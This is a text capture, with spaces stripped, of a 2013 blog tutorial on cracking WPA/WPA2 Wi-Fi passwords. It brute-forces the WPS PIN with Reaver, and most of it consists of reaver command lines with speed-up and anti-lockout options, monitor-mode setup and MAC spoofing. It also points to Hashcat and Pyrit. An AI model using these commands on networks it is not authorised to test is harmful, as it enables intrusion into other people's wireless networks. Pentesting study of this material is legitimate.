cracking wifi wpa_wpa2 passwords using reaver-wps - blackmore ops
TRANSCRIPT
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 1/11
CrackingWifiWPA/WPA2passwordsusingReaverWPSThisentrywaspostedinCrackingHackingLinuxReaverWifiWirelessandtaggedCrackingReaverWPSWifiWPA2onOctober12,2013byblackMOREOps(updated13daysago)
reaverwpsBruteforceattackagainstWifiProtectedSetupCrackingWifiWPA/WPA2passwordsusingReaverWPS
1.
2.
3.
4.
5.
6.
Top5Wireless
WirelessEarbuds
WifiBooster
WirelessConnection
WirelessAccess
WirelessWiFi
HomeCrackingCrackingWifiWPA/WPA2passwordsusingReaverWPS
2
Learnonetrickaday....
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 2/11
Overview:ReaverwpsperformsabruteforceattackagainstanaccesspointsWiFiProtectedSetuppinnumber.OncetheWPSpinisfound,theWPAPSKcanberecoveredandalternatelytheAPswirelesssettingscanbereconfigured.ThispostoutlinesthestepsandcommandthathelpscrackingWifiWPA/WPA2passwordsusingReaverWPS.
WhileReaverwpsdoesnotsupportreconfiguringtheAP,thiscanbeaccomplishedwithwpa_supplicantoncetheWPSpinisknown.
Readers,notethatIvesincewrittenanotherpostwhereIcouldcrackapasswordin14.21seconds.usingpyritcowpattyandWiFitecombinationattackwithdictionary.Thewholeprocesstakeslessthan10minutes.
ThosewhowouldliketotrymorewaysofcrackingWifiWPAWPA2passwords,youcanalsouseHashCatorcudaHashcatoroclHashcattocrackyourunknownWifiWPAWPA2passwords.ThebenefitofusingHashcatis,youcancreateyourownruletomatchapatternanddoaBruteforceattack.Thisisanalternativetousingdictionaryattackwheredictionarycancontainonlycertainamountofwordsbutabruteforceattackwillallowyoutotesteverypossiblecombinationsofgivencharsets.HashcatcancrackWifiWPA/WPA2passwordsandyoucanalsouseittocrackMD5,phpBB,MySQLandSHA1passwords.UsingHashcatisangoodoptionasifyoucanguess1or2charactersinapassword,itonlytakesfewminutes.Forexample:ifyouknow3charactersinapassword,ittakes12minutestocrackit.Ifyouknow4charactersinapassword,ittakes3minutes.YoucanmakerulestoonlytrylettersandnumberstocrackacompletelyunknownpasswordifyouknowacertainRoutersdefaultpasswordcontainsonlythose.Possibilitiesofcrackingisalothigherinthisway.
1.
2.
3.
4.
5.
WirelessWiFi
Top5Wireless
WifiBooster
WirelessAccessPoints
WirelessEarbuds
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 3/11
ImportantNote:Manyuserstrytocapturewithnetworkcardsthatarenotsupported.YoushouldpurchaseacardthatsupportsKaliLinuxincludinginjectionandmonitormodeetc.Alistcanbefoundin802.11RecommendedUSBWirelessCardsforKaliLinux.Itisveryimportantthatyouhaveasupportedcard,otherwiseyoullbejustwastingtimeandeffortonsomethingthatjustwontdothejob.
Contents[hide]
reaverwpsBruteforceattackagainstWifiProtectedSetupCrackingWifiWPA/WPA2passwordsusingReaverWPS
Overview:Description:Installation:Usage:MoreonBasicUsagesSpeedingUptheAttackMACSpoofingSupportedWirelessDrivers
PartiallySupportedNotSupported
ConclusionRelated
Description:ReaverwpstargetstheexternalregistrarfunctionalitymandatedbytheWiFiProtectedSetupspecification.Accesspointswillprovideauthenticatedregistrarswiththeircurrentwirelessconfiguration(includingtheWPAPSK),andalsoacceptanewconfigurationfromtheregistrar.
Inordertoauthenticateasaregistrar,theregistrarmustproveitsknowledgeoftheAPs8digitpinnumber.RegistrarsmayauthenticatethemselvestoanAPatanytimewithoutanyuserinteraction.BecausetheWPSprotocolisconductedoverEAP,theregistrarneedonlybeassociatedwiththeAPanddoesnotneedanypriorknowledgeofthewirelessencryptionorconfiguration.
ReaverwpsperformsabruteforceattackagainsttheAP,attemptingeverypossiblecombinationinordertoguesstheAPs8digitpinnumber.Sincethepinnumbersareallnumeric,thereare10^8(100,000,000)possiblevaluesforanygivenpinnumber.However,becausethelastdigitofthepinisachecksumvaluewhichcanbecalculatedbasedontheprevious7digits,thatkeyspaceisreducedto10^7(10,000,000)possiblevalues.
ThekeyspaceisreducedevenfurtherduetothefactthattheWPSauthenticationprotocolcutsthepininhalfandvalidateseachhalfindividually.Thatmeansthatthereare10^4(10,000)possiblevaluesforthefirsthalfofthepinand10^3(1,000)possiblevaluesforthesecondhalfofthepin,withthelastdigitofthepinbeingachecksum.
Reaverwpsbruteforcesthefirsthalfofthepinandthenthesecondhalfofthepin,meaningthattheentirekeyspacefortheWPSpinnumbercanbeexhaustedin11,000attempts.ThespeedatwhichReavercantestpinnumbersisentirelylimitedbythespeedatwhichtheAPcanprocessWPSrequests.SomeAPsarefastenoughthatonepincanbetestedeverysecondothersareslowerandonlyallowonepineverytenseconds.Statistically,itwillonlytakehalfofthattimeinordertoguessthecorrectpinnumber.
Installation:InstallKaliLinux,everythingbuiltintoit.(Reaverwps,libpcapandlibsqlite3)
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 4/11
Usage:Usually,theonlyrequiredargumentstoReaverwpsaretheinterfacenameandtheBSSIDofthetargetAP:
#reaverimon0b00:01:02:03:04:05
ThechannelandSSID(providedthattheSSIDisnotcloaked)ofthetargetAPwillbeautomaticallyidentifiedbyReaverwps,unlessexplicitlyspecifiedonthecommandline:
#reaverimon0b00:01:02:03:04:05c11elinksys
Bydefault,iftheAPswitcheschannels,Reaverwpswillalsochangeitschannelaccordingly.However,thisfeaturemaybedisabledbyfixingtheinterfaceschannel:
#reaverimon0b00:01:02:03:04:05fixed
Thedefaultreceivetimeoutperiodis5seconds.Thistimeoutperiodcanbesetmanuallyifnecessary(minimumtimeoutperiodis1second):
#reaverimon0b00:01:02:03:04:05t2
Thedefaultdelayperiodbetweenpinattemptsis1second.Thisvaluecanbeincreasedordecreasedtoanynonnegativeintegervalue.Avalueofzeromeansnodelay:
#reaverimon0b00:01:02:03:04:05d0
SomeAPswilltemporarilylocktheirWPSstate,typicallyforfiveminutesorless,whensuspiciousactivityisdetected.Bydefaultwhenalockedstateisdetected,Reaverwpswillcheckthestateevery315seconds(5minutesand15seconds)andnotcontinuebruteforcingpinsuntiltheWPSstateisunlocked.Thischeckcanbeincreasedordecreasedtoanynonnegativeintegervalue:
#reaverimon0b00:01:02:03:04:05lockdelay=250
Foradditionaloutput,theverboseoptionmaybeprovided.Providingtheverboseoptiontwicewillincreaseverbosityanddisplayeachpinnumberasitisattempted:
1.
2.
3.
4.
5.
WirelessWiFi
Top5Wireless
WifiBooster
WirelessAccessPoints
WirelessEarbuds
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 5/11
#reaverimon0b00:01:02:03:04:05vv
ThedefaulttimeoutperiodforreceivingtheM5andM7WPSresponsemessagesis.1seconds.Thistimeoutperiodcanbesetmanuallyifnecessary(maxtimeoutperiodis1second):
#reaverimon0b00:01:02:03:04:05T.5
SomepoorWPSimplementationswilldropaconnectiononthefloorwhenaninvalidpinissuppliedinsteadofrespondingwithaNACKmessageasthespecsdictate.Toaccountforthis,ifanM5/M7timeoutisreached,itistreatedthesameasaNACKbydefault.However,ifitisknownthatthetargetAPsendsNACKS(mostdo),thisfeaturecanbedisabledtoensurebetterreliability.ThisoptionislargelyuselessasReaverwpswillautodetectifanAPproperlyrespondswithNACKsornot:
#reaverimon0b00:01:02:03:04:05nack
WhilemostAPsdontcare,sendinganEAPFAILmessagetocloseoutaWPSsessionissometimesnecessary.Bydefaultthisfeatureisdisabled,butcanbeenabledforthoseAPsthatneedit:
#reaverimon0b00:01:02:03:04:05eapterminate
When10consecutiveunexpectedWPSerrorsareencountered,awarningmessagewillbedisplayed.SincethismaybeasignthattheAPisratelimitingpinattemptsorsimplybeingoverloaded,asleepcanbeputinplacethatwilloccurwheneverthesewarningmessagesappear:
#reaverimon0b00:01:02:03:04:05failwait=360
MoreonBasicUsagesFirst,makesureyourwirelesscardisinmonitormode:
#airmonngstartwlan0
TorunReaver,youmustspecifytheBSSIDofthetargetAPandthenameofthemonitormodeinterface(usuallymon0,notwlan0,althoughthiswillvarybasedonyourwirelesscard/drivers):
#reaverimon0b00:01:02:03:04:05
YouwillprobablyalsowanttousevvtogetverboseinfoaboutReaversprogress:
#reaverimon0b00:01:02:03:04:05vv
SpeedingUptheAttackBydefault,Reaverwpshasa1seconddelaybetweenpinattempts.Youcandisablethisdelaybyaddingd0onthecommandline,butsomeAPsmaynotlikeit:
#reaverimon0b00:01:02:03:04:05vvd0
Anotheroptionthatcanspeedupanattackisdhsmall.ThisoptioninstructsReavertousesmalldiffiehellmansecretnumbersinordertoreducethecomputationalloadonthetargetAP:
#reaverimon0b00:01:02:03:04:05vvdhsmall
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 6/11
MACSpoofingInsomecasesyoumaywant/needtospoofyourMACaddress.ReaversupportsMACspoofingwiththemacoption,butyoumustensurethatyouhavespoofedyourMACcorrectlyinorderforittowork.
ChangingtheMACaddressofthevirtualmonitormodeinterface(typicallynamedmon0)WILLNOTWORK.YoumustchangetheMACaddressofyourwirelesscardsphysicalinterface.Forexample:
#ifconfigwlan0down#ifconfigwlan0hwether00:BA:AD:BE:EF:69#ifconfigwlan0up#airmonngstartwlan0#reaverimon0b00:01:02:03:04:05vvmac=00:BA:AD:BE:EF:69
SupportedWirelessDriversThefollowingwirelessdrivershavebeentestedorreportedtoworksuccessfullywithReaverwps:
ath9krtl8187carl19170ipw2000rt2800pcirt73usb
PartiallySupported
Thefollowingwirelessdrivershavehadmixedsuccess,andmayormaynotworkdependingonyourwirelesscard(i.e.,ifyouarehavingproblemswiththesedrivers/cards,considertryinganewcardbeforesubmittingatroubleticket):
ath5kiwlagnrtl2800usb(usingthelatestcompatwirelessdrivershasfixedmanyuser'sproblems,hinthint...)b43
NotSupported
Thefollowingwirelessdrivers/cardshavebeentestedorreportedtonotworkproperlywithReaver:
iwl4965RT3070LNetgearWG111v3
ConclusionIfyouwanttoPentestorHackyourWifiPasswords,thenthefirstthingyouneedisacompatibleWificard.MostWificardsarepricedbetween15$35$USD.Iseenopointstrugglingwithanunsupportedcardwhenyoucanjustinvestthatextrabucksandthatcardwilllastyouyears.YougettolearnhowtopentestorhackWifipasswords,howtoInject,spoof,setupfakeAPorHoneypot.SeethelistofsupportedUSBWifiadaptercardsthatworksinKaliLinuxandareavailableinAmazon.
Relatedpost:SpeedupWPA/WPA2crackingwithPyritandCUDAandleveragingWifite[Thispostisnowreplacedandupdatedbythenextonebelow]
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 7/11
CrackingWifiWPA/WPA2passwordsusingpyritcowpattyinKaliLinux
AboutblackMOREOpsblackMOREOpsisdedicatedtoHowto,Guides,SecurityfeaturesandTipsandTricksforLinuxOS.Thankyouforvisitingusandfollowusherewww.blackmoreops.com.
ViewallpostsbyblackMOREOps
LeaveaReply
Notifymeofnewcommentsviaemail.
Notifymeofnewpostsviaemail.
PostComment
Email(required) (Addressnevermadepublic)
Name(required)
Website
2thoughtsonCrackingWifiWPA/WPA2passwordsusingReaverWPS
Pingback:AdetailedguideoninstallingKaliLinuxonVirtualBoxblackMOREOps
Pingback:20thingstodoafterinstallingKaliLinuxblackMOREOps
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 8/11
FixingPulseAudioconfiguredforperusersessions(warning)inKaliLinuxandDebian
WPSCANandquickwordpresssecurity
P o s t n a v i g a t i o n
GoogleSiteSearch
RecentPostsdarodar.comreferrerspamandWhattodo?
RandomquotesandcreaturesusingfortuneandcowsayinLinuxterminal
Fixingerror:Packagepackagenameisnotavailable,butisreferredtobyanotherpackage.Thismaymeanthatthepackageismissing,hasbeenobsoleted,orisonlyavailablefromanothersourceE:Packagepackagenamehasnoinstallationcandidate
FixingProxyChainsERROR:ld.so:objectlibproxychains.so.3fromLD_PRELOADcannotbepreloaded:ignored.
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 9/11
ArchivesDecember2014(6)November2014(3)October2014(4)
September2014(5)
RecentCommentsFixingProxyChainsERROR:ld.so:object'libproxychains.so.3'fromLD_PRELOADcannotbepreloaded:ignored.blackMOREOpson20thingstodoafterinstallingKaliLinux
802.11RecommendedUSBWirelessCardsforKaliLinuxblackMOREOpsonTPLinkTLWDN3200N600WirelessDualBandUSBAdapterinLinux
802.11RecommendedUSBWirelessCardsforKaliLinuxblackMOREOpsonCrackingWifiWPA/WPA2passwordsusingpyritcowpattyinKaliLinux
Links18/12/2014:LinuxQuestions.orgPolls,FedoraforPOWER|TechrightsonRandomquotesandcreaturesusingfortuneandcowsayinLinuxterminal
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 10/11
August2014(9)July2014(2)
June2014(10)April2014(2)
March2014(8)February2014(6)January2014(12)
December2013(10)November2013(12)October2013(29)
CategoriesBIOS(1)
Browser(5)Cracking(3)
DataRecovery(1)DDOS(1)
Denialofservice(1)Driver(2)
Hacking(4)Hashcat(1)Howto(87)Linux(115)
Administration(17)AMD(9)BIND(1)
CentOS(1)cli(12)
DesktopManagers(12)KaliLinux(62)Metasploit(2)Monitoring(3)Networking(4)NVIDIA(7)
ProxyChains(1)Pyrit(8)
Reaver(1)Security(8)Sound(2)VPN(1)
WPSCAN(2)
News(1)Others(12)
Recoverrootpassword(1)Spam(1)
Usability(2)USB(1)
-
22/12/2014 CrackingWifiWPA/WPA2passwordsusingReaverWPSblackMOREOps
http://www.blackmoreops.com/2013/10/12/crackingwifiwpawpa2passwordsusingreaverwps/ 11/11
Backtotop
VirtualBox(2)Wifi(9)
Wireless(3)Wordpress(2)
RSSFeedRSSPosts
RSSComments
2014blackMOREOpsDesignedbyThemes&Co